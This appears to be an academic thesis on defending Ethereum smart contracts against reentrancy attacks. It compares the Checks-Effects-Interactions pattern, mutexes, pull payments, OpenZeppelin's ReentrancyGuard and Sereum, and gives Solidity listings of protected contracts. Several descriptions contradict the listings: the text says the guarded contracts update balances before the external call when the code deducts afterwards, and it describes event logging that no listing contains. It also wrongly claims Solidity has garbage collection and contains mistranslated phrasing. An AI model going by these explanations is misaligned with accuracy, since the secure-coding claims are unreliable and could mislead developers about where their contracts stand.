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Smart Contract Security:
Evaluating Efficiency and Performance of
Preventing Re-entrancy Attacks

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Abstract

This paper provides a deep overview of popular smart contract protection mechanisms used in blockchain technology against *re-entry attacks*. The conducted analysis of research has shown quite convincingly that this type of attack is the most significant among others and is the subject of most scientific work and preventive measures. This is a very clear indication of the relevance of this topic in the field of digital security, and more precisely in the field of blockchain transaction security.

To increase the practical significance of this work, performance tests were also performed on the basic smart contracts, which were protected by various methods. The methodology for assessing the performance of smart contracts in the Ethereum system (decentralized blockchain with smart contract functionality) is determined by gas costs. This is the only one main metric for assessing the performance of smart contracts (for example, when transferring funds from one account to another).

This approach, together with comparative characteristics of protective mechanisms, should provide a deep understanding to developers of smart contracts that are aimed at ensuring the performance and security of the systems being developed. The work may be useful to other researchers, as well as anyone interested in blockchain technologies, to improve their understanding of modern smart contract security systems and methods for evaluating their performance.

The source code for all implementations, analyses, and experiments described in this thesis is available at the author's [public repository on GitHub](#) (Pakhomovskii, 2024).

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Table of Contents

1. Introduction	1
2. Literature Review	8
2.1 Detailed Analysis of Reentrancy Attacks	8
2.1.1 Illustration and General Steps of the Reentrancy Attack	9
2.2 Overview of Defense Mechanisms Against Reentrancy Attacks	11
2.2.1 The Checks-Effects-Interactions (CEI) Pattern	14
2.2.2 Mutexes to Prevent Reentrancy	17
2.2.3 Pull Payments Instead of Push Payments	19
2.2.4 ReentrancyGuard Library from the OpenZeppelin Library	21
2.2.5 Sereum Technology	24
2.3 Results of the Review and Statement of the Hypothesis	26
3. Methodology	28
3.1 Ethical Aspects of Reentrancy Attack Research	28
3.2 Methodology for Smart Contract Testing	29
3.2.1 Key Metrics and Performance Evaluation Mechanism	29
3.2.2 Development and Testing Tools	30
3.3 Explanation of the Approach to Contract Protection, Attack, and Transfer of Funds	31
3.3.1 Demonstration of a Reentrancy Attack	32
3.3.2 Implementation of Performance Testing of Secure Smart Contracts	36
3.3.3 Measuring Gas Consumption	39
4. Results	42
5. Discussion	50
5.1 Gas Consumption Analysis for a Contract with Different Protection	50
5.2 General Recommendations	52
5.3 Comparison of Approaches to Protecting Smart Contracts in Other Programming Languages	54
6. Conclusion	56
References	58

1. Introduction

The development of blockchain technologies has become widespread across various fields. This has already revolutionized industries by introducing new paradigms of full decentralization, transparency, and security. This is brief explanation of most common blockchain concepts:

- Decentralization: Blockchain removes the need for a central authority, increasing transparency and strongly avoid the risk of single points of failure. It empowers participants by giving them full control over their data and transactions instead of relying on intermediaries (Nakamoto, 2008).
- Immutability: Data on the blockchain cannot be modified or removed, ensuring its permanence. Once a transaction is verified and added, it becomes part of an unalterable record, which helps cultivate trust among participants (Yli-Huumo et al., 2016).
- Security: Blockchain employs cryptographic techniques that offer strong protection against unauthorized access and fraud. By combining public and private keys with consensus mechanisms, the network remains resilient against malicious actions (Dinh et al., 2018).
- Transparency: All transactions on the blockchain are accessible to network members, enabling independent validation and monitoring. This transparency reduces opportunities for corruption or fraud, as every transaction is logged and can be audited (Zheng et al., 2017).
- Efficiency: Blockchain can automate processes and reduce costs associated with intermediaries, streamlining operations such as financial transactions. Smart contracts enable automatic execution of agreements when predefined conditions are met, reduce or completely remove delays and operational costs (Christidis & Devetsikiotis, 2016).

Security is arguably the most critical factor when choosing blockchain technologies, especially in sectors like finance or areas dealing with sensitive personal data. In such domains, ensuring the security of transactions and contracts is paramount. Any vulnerability can lead to financial losses and damage

to reputation. This reduces the important needs to implement robust security systems for transactions and *smart contracts*, which will be discussed in more detail.

The diagram (Figure 1) from the article "A study of application platform for smart contract visualization based blockchain" (2022) by SoonHyeong Jeong and Byeongtae Ahn illustrates the process of developing, deploying and invoking smart contracts. The code is compiled into bytecode, function signatures and ABI, then the contract is placed on the blockchain. Interaction with the network and applications (e.g. JavaScript, Go, Java) is carried out via RPC/IPC/WS protocols.

Figure 1: Architecture of interaction of smart contracts with the blockchain network and applications (SoonHyeong, 2022)

Smart contracts, as described by Sanjay and Arvind (2023), offer increased security, transparency, and efficiency compared to traditional contracts, avoid the need for intermediaries and reduce the risk of human error. However, the very nature of smart contracts—being immutable once deployed—means that any bugs or vulnerabilities can have severe and irreversible consequences (Atzei et al., 2017).

Despite their advantages, smart contracts are not immune to vulnerabilities. In most defense mechanisms, the main goal is to prevent well-known attacks that have previously harmed enterprises, as well as targeting vulnerabilities specific to blockchain technologies.

The figure below (CoinGecko, 2022), illustrates the most prevalent security attacks on smart contracts and the corresponding solutions.

Description	Re-entrancy vulnerability (A1)	Underflow/Overflow errors (A2)	Sybil attacks (A3)	Bad randomness (A4)	Double spending attacks (A5)	Majority attacks (A6)	Destroyable contracts (A7)	Exception disorder (A8)	Call stack vulnerability (A9)	Unbounded computational power intensive operations(A10)
SmartCheck : Comprehensive analysis tool to detect code issues in Ethereum smart contracts	✓	✓				✓				
MAIAN : Inter-procedural symbolic analysis and validation of Ethereum,		✓		✓						
ReGuard : Fuzzy-based analyzer to detect re-entrancy vulnerabilities in Ethereum	✓									
ContractFuzzer : Fuzzy framework to detect vulnerabilities in Ethereum	✓		✓						✓	
Oyente : A framework to detect bugs in the smart contracts	✓			✓					✓	✓
S-gram : Prediction tool fo potential vulnerabilities by irregular token sequences	✓									
Vandal : Security analysis framework for Ethereum with conversion capability of EVM byte code into semantic relations	✓						✓	✓		
Prosity : Decompiler for Ethereum which generates readable Solidity syntaxes from bytecode	✓			✓					✓	
MadMax : Static programming analysis technique to detect gas focused vulnerabilities		✓								✓
Ethereum Eclipse Attacks and Solutions : Vulnerabilities in consensus and block synchronization and countermeasures					✓					
Securify : Scalable security analyzer for Ethereum	✓									
Semantic analysis framework : Semantic security analysis framework for Ethereum using F* programming language	✓							✓		
TrustChain : Permission-less tamper proof data structure with sybil resistance			✓		✓					
Zeus : Correctness verifier and fairness validator for smart contracts	✓									
EtherTrust : Automated static analyzer for EVM bytecode	✓									
MantiCore : Binary analyzer for Ethereum smart contracts to detect logic bombs	✓									
Cryptocurrency smart contracts for distributed consensus of public randomness : A secured random number generator				✓						

Figure 2: Security Attacks and Solutions (CoinGecko, 2022)

As shown in Figure 2, reentrancy attacks, access control issues, and arithmetic bugs are among the top vulnerabilities exploited by attackers. Among these, *reentrancy attacks* stand out due to their huge impact and the challenges they pose in secure contract development.

This table in Figure 2 only demonstrates the popularity of protection against re-entry attempts, but unfortunately access to many libraries is either paid or exclusive, for example, within the framework of implementation on one project. In this regard, it is difficult to conduct a direct comparative characteristic of the listed ready-made solutions, although this would be extremely useful. In other words, not all solutions are fully described by developers, and access to them is most often closed. But for this work, which uses well-known patterns and open libraries that are embedded directly into the code, and are not static analyzers.

Returning to the issue of the relevance of protection against re-entry, it is impossible not to mention the important role that the lack of proper protection in smart contracts can play. The article "Formal Analysis of Reentrancy Vulnerabilities in Smart Contracts Based on CPN" (He et al., 2023) describes reentrancy attacks in detail. Reentrancy attacks exploit the way smart contracts handle external calls, allowing attackers to repeatedly invoke a function in a smart contract before the initial execution is finalized. This process can lead to unpredictable contract behavior and financial losses. Notably, the infamous DAO attack in 2016 resulted in the theft of approximately 60 million US dollars, shaking the Ethereum community and leading to a hard fork (Atzei et al., 2017). More recently, the Cream Finance project suffered a loss of about 34 million US dollars in 2021 due to a reentrancy attack (Chainalysis, 2021).

To implement a smart contract protection system against re-entry attacks, it is crucial to carefully study simulation methods to comprehensively test contracts and understand what performance metrics can be used. This involves analyzing the contract's behavior under different scenarios, identifying potential vulnerabilities, and assessing the impact of protective measures on performance. Understanding how these protective mechanisms affect *gas consumption* and execution time is essential, as excessive costs can deter users and limit the practicality of the contract.

A few words about the programming language Solidity, which was used in this work. Solidity, being the most widely used programming language for smart contracts on the Ethereum platform, plays a significant role in this context.

Language	Garbage Collection	Inheritance	Reentrancy Protection	Decentralized Oracle Support	Memory Safety	Type Safety	Secure Coding Practices
Ivy	✓	✓	✓	✓	✓	✓	Limited
RSK	×	✓	✓	✓	✓	✓	Limited
BitML	×	✓	✓	✓	✓	✓	Limited
Solidity	×	✓	✓	✓	✓	✓	Extensive
Scilla	✓	×	✓	✓	✓	✓	Extensive
Vyper	✓	×	✓	✓	✓	✓	Extensive
Flint	✓	×	✓	✓	✓	✓	Limited
Haskell	✓	✓	✓	✓	✓	✓	Extensive
Go	×	×	✓	×	✓	✓	Limited
Node.js	×	×	✓	×	✓	✓	Limited
Java	×	✓	✓	×	✓	✓	Extensive
Pact	×	✓	✓	✓	✓	✓	Extensive
C#	×	✓	✓	×	✓	✓	Extensive
F#	✓	✓	✓	✓	✓	✓	Limited
VB.net	×	✓	✓	×	✓	✓	Limited
Kotlin	✓	✓	✓	✓	✓	✓	Extensive
Python	×	×	✓	×	✓	✓	Limited
Ink!	✓	✓	✓	✓	✓	✓	Limited
C++	×	✓	✓	×	✓	✓	Extensive
Rust	✓	✓	✓	✓	✓	✓	Limited
RIDE	✓	✓	✓	✓	✓	✓	Limited
Michelson	✓	×	✓	×	✓	✓	Limited
Liquidity	✓	×	✓	×	✓	✓	Limited
TinyGo	✓	×	✓	×	✓	✓	Limited
TEAL	×	×	✓	×	✓	✓	Limited

Figure 3: Smart Contract Language Characteristics (CoinGecko, 2022)

As illustrated in Figure 3, which outlines Smart Contract Language Characteristics, Solidity's prevalence makes it a primary target for both attackers and security researchers. According to a survey by CoinGecko in 2022, over 90% of smart contracts deployed on Ethereum are written in Solidity.

While other languages and platforms exist for smart contract development, such as Vyper for Ethereum or languages used in other blockchain ecosystems, the dominance of Solidity cannot be overstated. Its syntax, resembling that of JavaScript and C++, makes it accessible to developers, but it also brings challenges in terms of security due to its complexity and the potential for subtle bugs (Luu et al., 2016).

The only downside that can be highlighted in the Solidity language is the presence of a garbage collector. As can be seen from the table, such a programming language as Rust does not have this problem, since the developer

himself completely determines the visibility zones of variables and objects in general. And by default, any data leakage is not possible. This aspect is discussed in the “Discussion” section of this work.

To conduct testing and comparative analysis of reentrancy attack protection systems, it is necessary to select a suitable platform for deploying smart contracts. In this paper, Ethereum will be used as the main platform for several reasons:

- **Robust Development Tools:** The Ethereum ecosystem provides powerful development tools like Truffle, Remix, and Hardhat, all of which streamline the process of creating, testing, and deploying smart contracts. These tools support debugging, testing, and simulation of potential attacks, making it simpler to evaluate and refine security measures.
- **Availability of Testnets:** Ethereum offers multiple testnets where developers can experiment without using real funds. This is particularly important for researching security threats because it allows for safe modeling of different attack scenarios and stress-testing contracts without risking actual assets.
- **Community and Support:** A large community of developers and security specialists actively contributes to discussions, shares best practices, and collaborates on improvements. This collective effort helps build more secure smart contracts and promotes the spread of knowledge about vulnerabilities and how to address them.

Using Ethereum as a testing platform will allowed to obtain relevant results and draw informed conclusions about the effectiveness of different approaches to reentrancy protection implemented in Solidity. By focusing on Solidity and the Ethereum platform, the author aligns research with the most widely used technologies in the blockchain space, increasing the applicability and impact of findings.

In this work the author provides a deep analysis of reentrancy attacks by reviewing existing literature and examining the current protection mechanisms implemented in Solidity. This analysis covered mutexes, the

Checks-Effects-Interactions pattern, and the *nonReentrant* modifier from the OpenZeppelin library.

Furthermore, testing of these protection mechanisms was made to assess their effectiveness and impact on the performance metric - *gas consumption*. By comparing the protected contracts with their vulnerable counterparts, the author's aim to highlight the trade-offs between security and efficiency. Understanding these mechanisms could be crucial for developers who want to find a balance between the need for security with the practical considerations of cost and performance.

The main goal of this work is to provide practical recommendations based on in-depth analysis that can help developers create more secure and efficient smart contracts, ultimately increasing the reliability and trustworthiness of blockchain-based applications.

2. Literature Review

2.1 Detailed Analysis of Reentrancy Attacks

As discussed above, reentrancy attacks in Ethereum smart contracts currently exist as one of the most serious security threats. Even in a potentially secure mechanism due to the established theory of a secure and decentralized blockchain. In the past, these attacks have often resulted in financial losses and undermined user trust in decentralized applications (dApps). Here is the putative impact on the Ethereum ecosystem:

- Financial losses: Attacks of this type can lead to noticeable financial losses for users and projects (Atzei et al., 2017).
- Loss of trust: Such incidents erode user confidence in the security of blockchain projects. Reentrancy attacks and other vulnerabilities significantly impact the reliability of decentralized applications (Rodler et al., 2019).
- Regulatory risks: The growing attention of regulators to smart contract security, such as the European Union's recent Cyber Resilience Act, highlights the need for stricter security measures (European Commission, 2024).
- Increased audit costs: Security issues in smart contracts necessitate investments in auditing, with financial products requiring stringent oversight from cybersecurity experts (Li et al., 2020).

Considering all of the above, there is a need for an in-depth study of the existing literature on smart contracts and protection mechanisms.

The research question may sound like this: *what are the potential advantages and disadvantages of popular publicly available methods of protecting smart contracts from reentrancy attempts?*

In a more expanded form, it can be described as follows as a "systematic study of existing mechanisms for protecting against attacks called "reentrancy attacks", analyzing their effectiveness based on experimental data and giving practical recommendations for developing secure smart contracts."

Particular attention is paid to analyzing the effectiveness of four widely used protection strategies: the Checks-Effects-Interactions (CEI) pattern, the use of mutexes, the use of pull payments and the use of the currently very popular ReentrancyGuard library from OpenZeppelin, since they have the ability to measure gas consumption as a primary performance indicator.

Before starting to analyze each pattern, it is necessary to provide a more visual representation of the reentrancy attack as a process that operates according to a certain scheme.

2.1.1 Illustration and General Steps of the Reentrancy Attack

This attack process includes a recursive call by an external contract to a vulnerable function of another contract before its initial execution is complete. The hacker uses the moment when the contract state has not yet been updated, and this will allow him to re-call the function and manipulate the balance or other sensitive data.

The attack mechanism includes the following steps:

1. Deploying a malicious contract: The attacker creates a contract that is intended to interact with the target contract, such as a contract to fulfill some financial obligations.
2. Initiating a withdrawal: Then he calls the withdrawal function in the target contract.
3. Outward call: The target contract sends funds (in this case, Ether) to the attacker before updating its state.
4. Recursive call: The malicious contract uses the fallback or receive function to call the withdrawal function in the target contract again.
5. Repeating the process: Since the state of the target contract is not updated, the attacker can repeat the process until he runs out of funds.

Figure 4 shows a flow chart illustrating the reentrancy attack process.

Figure 4: Reentrancy Attack Mechanism on DAO (Decentralized Autonomous Organization - a decentralized autonomous organization running on a blockchain, where governance is carried out through smart contracts and decisions are made by a community of participants).

The diagram (Figure 4) is a classic example of using attack recursion for a function that is not yet complete. Of course, this example is minimal and very abstract. There is a defect and flaw in the language itself, which was an easy target for an attacking contract. In later versions of Solidity, starting with 0.6.0, the syntax of the fallback and receive functions was changed, which increased the security of smart contracts. Previously, a single fallback function handled both the receipt of ether and calls to non-existent functions, which could lead to unintended behavior and vulnerabilities. Now these functions are separated

Solidity 0.6.x features: fallback and receive functions (Soliditylang.org, 2020):

- *receive()*: special function to receive airtime with empty call data.
- *fallback()*: called when no matching function is found or *receive()* is missing.

This separation improves the readability and security of the code, reducing the risk of reentrancy attacks, where attackers used fallback functions for recursive calls and theft of funds.

In even later versions of Solidity, even more significant changes were made, some of which will be used as an independent protection system.

But the threat is evolving very quickly, and the amount of protection beyond what is built into the language model suggests that the problem remains. All this is discussed in detail in the Methodology section of this work, and a demonstration of the attack process itself on test e-wallets is also presented.

2.2 Overview of Defense Mechanisms Against Reentrancy Attacks

The explanation for the choice of these approaches can be expressed in the need to compare potentially different protections by their nature (how they are implemented):

- Library (OpenZeppelin)
- Development pattern (CEI Pattern and Advanced CEI Pattern)
- Syntactic-logical feature of the language (Mutexes)
- Change in the usual payment logic (Using pull payments)
- Third-party technology working in parallel and not included in the contract (Sereum)

Thus, having carried out a comparative characteristic of these approaches, it will also be possible to understand similar solutions, for example, the work of patterns in comparison with the work of libraries, and so on.

Below is the Table 1 with selected smart contract protection systems based on a literature review and official documentation indicating the most significant advantages and disadvantages, as well as areas of application:

Protection mechanism	Advantages	Disadvantages	Use examples
CEI Pattern	Easy to implement; does not increase gas costs	Requires developer discipline; can be complex in some features	Used in most secure contracts
Advanced CEI Pattern	Enhanced security with pre- and post-condition checks; handles complex workflows; scalable	Higher gas costs; more complex to implement; risk of overengineering for simpler workflows	Suitable for medium-to-high-risk contracts; advanced DeFi platforms, NFT marketplaces.
Using Mutexes	Effectively prevents re-entry	Increases gas costs; may block legitimate calls	Used in high security contracts
Using pull payments	Eliminates external calls; reduces risk of re-entry	Requires additional actions from the user; payment delays may occur	Used in payment systems and crowdfunding platforms
ReentrancyGuard library from OpenZeppelin	Proven solution; easy to implement	Increases contract size; dependency on external library	Widely used in OpenZeppelin Contracts

Protection mechanism	Advantages	Disadvantages	Use examples
"Sereum" Technology	Protects existing contracts without changing code; detects new types of reentrancy attacks	Requires EVM (Ethereum Virtual Machine) modification; difficult to implement on public blockchains; not suitable for current smart contracts	Research tool; potentially in private blockchains

Table 1: Comparative table of protection mechanisms

A more detailed analysis of each protection system is presented below and is a structure that lists the key features of the protection system and its application, as well as the pros and cons that are mentioned in publicly available sources.

It should be noted that the code presented as a display of each protection implementation is publicly available and recommended based on the best practices of the solidity community (Solidity Documentation, n.d.). Some of the code improvements were made in the present examples, but the main idea was preserved.

2.2.1 The Checks-Effects-Interactions (CEI) Pattern

The CEI pattern is widely used to prevent reentrancy attacks in smart contracts. The effectiveness of this pattern is supported by its extensive use and recommendations in the official Solidity documentation. According to the official Solidity documentation, the CEI pattern is one of the key recommendations for preventing reentrancy attacks (Solidity Documentation, n.d.). This classical approach involves three base stages: checking conditions, updating the state, and interacting with external contracts.

The CEI pattern is built on the following scheme:

- Checks: Validate input data and conditions before performing actions.
- Effects: Update state variables before interacting with the outside world.
- Interactions: Implement external calls and data transfers after all checks and updates.

This example below demonstrates how the Checks-Effects-Interactions (CEI) pattern prevents reentrancy attacks by ensuring that state updates occur before any external interactions. For more details on analyzing and mitigating vulnerabilities in Ethereum smart contracts, see Li et al. (2023). :

```
// SPDX-License-Identifier: MIT
// SecureCEI.sol
// The Checks-Effects-Interactions pattern is implemented based on the
// recommendations of the official Solidity documentation
```

```

pragma solidity ^0.8.0;

contract SecureCEI {
    mapping(address => uint256) public balances;

    constructor() payable {}

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 _amount) external {
        require(balances[msg.sender] >= _amount, "Insufficient balance");

        // Effects: Update state before external call
        balances[msg.sender] -= _amount;

        // Interaction: External Challenge
        (bool success, ) = payable(msg.sender).call{value: _amount}("");
        require(success, "Transfer failed");
    }
}

```

Listing 1: Contract with CEI pattern protection (Solidity Documentation, n.d.)

Advantages: Does not increase gas costs. Easy to implement. Prevents attacks without additional dependencies.

Disadvantages: Requires strict discipline from the developer. May not be applicable in complex functions with multiple external calls.

Smart contract developers are advised to always follow the CEI pattern when creating functions that interact with external contracts or perform value transfers. Uniswap, one of the largest decentralized exchanges, actively uses the CEI pattern to ensure the security of its smart contracts. This demonstrates its relevance and importance for the decentralized finance (DeFi) sector (CryptoSlate, 2024).

The importance of the CEI pattern is also highlighted in the context of its integration into blockchain-based systems for enhancing safety and accountability. As described by Argento et al. (2020), the CEI pattern can be extended with modifications to log unexpected conditions and errors during the execution of smart contracts. This modified CEI pattern introduces event-based

logging in situations where unexpected states occur, improving traceability and debugging.

For example, in their approach, instead of relying solely on required statements, the CEI pattern is modified to emit events in cases of failure. This ensures that all unexpected states are logged on-chain, allowing for greater transparency and auditing:

```
// SPDX-License-Identifier: MIT

if(log.isLogged(_sender) == false) {
    emit TradeFailed(_sender, _receiver, _valueTradedHash, msg.sender);
    return false;
}
```

Listing 1.1: CEI pattern with improvement logic (Argento et al.,2020)

This modified CEI pattern allows the smart contract to maintain robustness while providing developers with more tools to monitor and mitigate potential vulnerabilities. By combining CEI with event logging, developers can address scenarios where reentrancy attacks or logic errors might still occur despite careful design.

The CEI pattern not only improves the security of individual smart contracts but also strengthens the entire blockchain infrastructure when applied consistently. In inter-organizational business processes, CEI ensures that critical operations are immutable, traceable, and error-resilient. This is especially important in decentralized applications (dApps) that handle high volumes of transactions and require strict compliance with operational integrity.

As blockchain-based solutions continue to evolve, the CEI pattern remains a foundational best practice. Its integration with advanced tools, such as those discussed by Argento et al. (2020), highlights its flexibility and enduring relevance in modern smart contract development.

In the performance analysis of contracts, both the classic example of the CEI pattern and the improved version (CEI Advanced) presented in this work.

2.2.2 Mutexes to Prevent Reentrancy

Mutexes use a boolean variable to block re-entry into a function until its execution completes. The paper "*Analysis of Reentrancy Attack Prevention Techniques in Ethereum Smart Contracts*" (Zhou et al., 2021) shows the impact of using mutexes on the security and performance of smart contracts. The authors note that while mutexes are effective in preventing attacks, they can increase gas costs and complicate contract logic.

locked Variable:

- Acts as a flag indicating whether the contract is currently executing a critical section.
- Initially set to false, it blocks re-entry when toggled to true.

noReentrant Modifier:

- Before the function executes, it checks if locked is false. If true, the function call is rejected with an error ("Reentrant call detected").
- The modifier sets locked = true during execution to block additional calls to the function.
- After the function completes, locked is reset to false, allowing future calls.

When the withdraw function is called, noReentrant ensures that only one execution occurs at a time by locking access during the external Ether transfer.

This prevents recursive reentrancy attacks, such as those seen in the 2016 DAO (Decentralized autonomous organization) exploit.

```
// SPDX-License-Identifier: MIT
// SecureMutex.sol
// The Checks-Effects-Interactions pattern and Mutex mechanism are
// implemented based on the recommendations of the official Solidity
// documentation

pragma solidity ^0.8.0;

contract SecureMutex {
```

```

mapping(address => uint256) public balances;
bool private locked;

constructor() payable {}

modifier noReentrant() {
    require(!locked, "Reentrant call detected");
    locked = true;
    _;
    locked = false;
}

function deposit() external payable {
    balances[msg.sender] += msg.value;
}

function withdraw(uint256 _amount) external noReentrant {
    require(balances[msg.sender] >= _amount, "Insufficient balance");

    // External call
    (bool success, ) = payable(msg.sender).call{value: _amount}("");
    require(success, "Transfer failed");

    balances[msg.sender] -= _amount;
}
}

```

Listing 2: contract with Mutex pattern protection

The SecureMutex contract implements the Mutex pattern to prevent reentrancy attacks, as described by Zhou et al. (2021). The noReentrant modifier uses a locked flag to block recursive calls, which increases gas costs and contract complexity. Additionally, the CEI pattern is enhanced with event logging in the trade function by emitting TradeFailed events, thereby improving transparency and recording unusual blockchain activities. Advantages: Efficiently blocks reentrancy and simple implementation. Disadvantages: Increases gas costs.

After the 2016 attack, mutexes were proposed as one way to prevent similar attacks in the future.

In fact, the concept of mutexes is not special, it's just that some programming languages use it at the core of their linguistic structure, for example Rust. It is discussed in the section “Discussion” of this work.

2.2.3 Pull Payments Instead of Push Payments

There are two approaches to payment processing in smart contracts: push payments and pull payments. In push payments, the contract itself sends funds to the recipient, which often requires external calls from functions that modify the contract's state. This can lead to vulnerabilities such as reentrancy attacks.

Pull payments offer an alternative approach: instead of the contract sending funds automatically, recipients themselves initiate the withdrawal of their funds from the contract. In this case, functions that modify the contract's state do not make external calls, which significantly reduces the risk of reentrancy attacks.

In the article "Smart Payment Contract Mechanism Based on Blockchain Smart Contract Mechanism" (Ge, 2021), the author explores secure payment mechanisms in smart contracts and emphasizes the importance of preventing reentrancy attacks. Ge notes that the use of pull payments improves the security of smart contracts by minimizing external calls inside critical functions. By allowing users to initiate withdrawals themselves, the system becomes more resilient to attacks and ensures reliable contract execution. However, developers need to weigh the advantages and disadvantages of this method, taking into account the needs and experience of their users.

Example implementation:

- State update: The user's balance is reset to zero before the external call is made, preventing re-entry.
- User initiates withdrawal: The user calls the withdraw function themselves to receive their funds.

```
// SPDX-License-Identifier: MIT
// SecurePullPayment.sol
// The Pull Payment pattern is implemented based on the recommendations of
// the official Solidity documentation and the enhancements proposed by Ge
// (2021)

pragma solidity ^0.8.0;

contract SecurePullPayment {
    mapping(address => uint256) public balances;
```

```

constructor() payable {}

function deposit() external payable {
    balances[msg.sender] += msg.value;
}

function withdraw() external {
    uint256 amount = balances[msg.sender];
    require(amount > 0, "No funds to withdraw");

    // Effects: Update state before external call
    balances[msg.sender] = 0;

    // Interaction: External Challenge
    (bool success, ) = payable(msg.sender).call{value: amount}("");
    require(success, "Transfer failed");
}
}

```

Listing 3: contract with PullPayment logic

The *SecurePullPayment* contract is developed based on the Pull Payment pattern proposed in the official Solidity documentation. Modifications were made to optimize the management of user balances and to incorporate a logging mechanism for failed trade attempts by emitting events, as suggested by Ge (2021).

Pull payments are recommended for use in the following cases:

- Security Priority: When system security is paramount and the risk of replay attacks needs to be minimized.
- Multiple Recipients: In systems with a large number of users who need to distribute funds without the risk of attacks.
- User Control: When users are willing to manage their own withdrawals and this is acceptable from a user experience perspective.
- Developers should carefully evaluate the needs of their project and users to decide whether pull payments are right for them.

Advantages:

- Improved security: Eliminating external calls from state-changing functions reduces the risk of reentrancy attacks.
- Easier to audit: Code becomes more understandable and easier to audit for vulnerabilities.
- User control: Users have full control over their withdrawals.

Disadvantages:

- Additional user actions: Requires users to initiate withdrawals themselves, which can be inconvenient.
- Contract fund accumulation: If users are inactive, funds can accumulate in the contract, increasing the security risk.
- Potential user challenges: Not all users may have knowledge to interact with the contract directly.

Many decentralized crowdfunding platforms use pull payments, allowing investors to withdraw their funds themselves in the event of an unsuccessful campaign, which increases the trust and security of the system.

2.2.4. ReentrancyGuard Library from the OpenZeppelin Library

One of the most effective and simple ways to protect smart contracts from reentrancy attacks is to use proven security libraries. OpenZeppelin is a widely used and respected library for developing secure smart contracts in Solidity. It provides a number of tools and design patterns, including the ReentrancyGuard module, which helps prevent reentrancy attacks with minimal changes to the code.

ReentrancyGuard implements the `nonReentrant` modifier, which can be applied to functions vulnerable to reentrancy. This modifier sets a lock when entering a function and releases it upon completion, ensuring that the function cannot be called again until its initial execution has finished.

Although some academic studies only slightly mention the ReentrancyGuard library, its use is very familiar in the industry as an effective method for protecting against reentrancy attacks. In the paper "Reentrancy Vulnerabilities in Ethereum Smart Contracts" (Torres et al., 2019), the authors analyze the prevalence and impact of reentrancy vulnerabilities in Ethereum smart contracts. They recommend using proven libraries and design patterns, such as those provided by OpenZeppelin, to mitigate the risks. The official Solidity documentation also highlights the importance of reentrancy prevention and recommends using approaches like ReentrancyGuard to ensure contract security (Solidity Documentation, n.d.).

```
// SPDX-License-Identifier: MIT
// SecureOZReentrancyGuard.sol
// The ReentrancyGuard contract is borrowed from OpenZeppelin Contracts

pragma solidity ^0.8.0;

// The ReentrancyGuard contract is borrowed from OpenZeppelin Contracts
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract SecureOZReentrancyGuard is ReentrancyGuard {
    mapping(address => uint256) public balances;

    constructor() payable {}

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw(uint256 _amount) external nonReentrant {
        require(balances[msg.sender] >= _amount, "Insufficient balance");

        // External call
        (bool success, ) = payable(msg.sender).call{value: _amount}("");
        require(success, "Transfer failed");

        balances[msg.sender] -= _amount;
    }
}
```

Listing 4: contract with SecureOZReentrancyGuard lib (is borrowed from OpenZeppelin Contracts)

From the code above, it can be noticed that this approach resembles the use of mutexes, as well as the CEI pattern in general, which potentially makes it very

secure. The contract inherits `ReentrancyGuard`, which gives access to the `nonReentrant` modifier. The `withdraw` function is marked with the `nonReentrant` modifier, which prevents re-entry into this function before it completes. The user's balance is updated before the external call is made, which follows the CEI pattern and provides additional protection.

Advantages:

- Trusted and tested: OpenZeppelin is the industry standard for secure smart contracts, and its solutions are thoroughly vetted by the community.
- Ease of implementation: `ReentrancyGuard` integration requires minimal code changes and does not add complexity to the contract logic.
- Compatibility: The library is regularly updated and supports the latest versions of Solidity, ensuring compatibility and security.

Disadvantages:

- Increase in contract size: Adding an external library can increase the size of the bytecode, which can lead to increased costs for deploying the contract to the Ethereum network.
- Dependency on external libraries: Relying on third-party libraries can be risky with updates and conduct audits.
- Limited flexibility: The `nonReentrant` modifier prohibits reentrancy at the function level, which can be limiting in cases where developers need to allow specific reentrants.

Many projects in the Ethereum ecosystem use the OpenZeppelin library to secure their smart contracts. `ReentrancyGuard` is a standard tool in this library and is used in a variety of contracts, including ERC20 tokens and decentralized applications (dApps).

Using the OpenZeppelin `ReentrancyGuard` library is an effective and popular way to protect smart contracts from reentrancy attacks. When combined with other best practices, such as the CEI pattern and the use of pull payments, developers can significantly increase the security of their contracts.

2.2.5 Sereum Technology

The last interesting protection that was considered in this paper is Sereum protection, although the smart contract protected by it cannot be implemented for quantitative analysis of gas consumption, it is impossible not to mention the innovative research method presented in it.

Sereum is a new approach to protecting smart contracts from re-entry attacks, proposed in the article "Sereum: Protecting Existing Smart Contracts Against Re-Entrancy Attacks" (Rodler et al., 2019). Unlike static analysis methods, Sereum implements dynamic taint tracking directly in the Ethereum Virtual Machine (EVM). This enables real-time detection and prevention of re-entry attacks, securing deployed contracts without code changes.

Since Sereum operates at the EVM level, not at the smart contract level, there is no direct contract code to demonstrate, nor is there a way to measure gas. However, the principle of operation can be described as follows: The contract calls an external function. Sereum tracks state variables used in conditions before a call and blocks any attempt to modify them after the call, preventing potential attacks.

Figure 5: Dynamic call tree of an Ethereum transaction. Contract A is called multiple times. V_k — state variables. D_i — a set of state variables that influence control decisions at a node i . L_i — a set of state variables that are "locked" in a node i and can no longer be changed (Rodler et al., 2019)

The image (Figure 5) illustrates how state variables (e.g. V_1, V_2, V_3, V_4) are passed between calls in the tree. This reflects a key principle of Sereum - tracking the impact of state variables on execution control. The variables D_i и L_i , specified in the nodes help to understand which variables participate in the computation and which are "blocked".

In Sereum, control over variables is important, especially after external calls. The picture shows how the data (D_7, D_8, D_{10}) affects L_5 , which demonstrates the key point of Sereum's method - preventing state variables from changing after returning from external calls. The tree clearly shows the structure of calls, where contract A is re-called at several levels. This coincides with Sereum monitoring possible re-entry scenarios (e.g. nodes 6 and 9, where A) and blocking dangerous changes.

Advantages:

- Protection without code modification: Allows to protect already deployed contracts without having to modify them.
- Detection of new attack types: Capable of detecting complex and previously unknown reentrancy attacks, including cross-functional and delegated attacks.
- Low false positive rate: Thanks to dynamic analysis in real time.

Disdvantages:

- Requires EVM modification: Requires modification or extension of the Ethereum virtual machine, which is difficult to implement in public blockchains.
- Difficult to implement: In public networks such as the Ethereum mainnet, modifying the EVM is almost impossible due to decentralized consensus.
- Not suitable for current smart contracts in their original form: Developers cannot simply add Sereum to their contract like a library or pattern.
- Sereum is used to analyze the security of smart contracts and identify vulnerabilities that are not detected by static analyzers.

In environments where it is possible to modify the EVM, Sereum can be integrated to improve the overall security of the network.

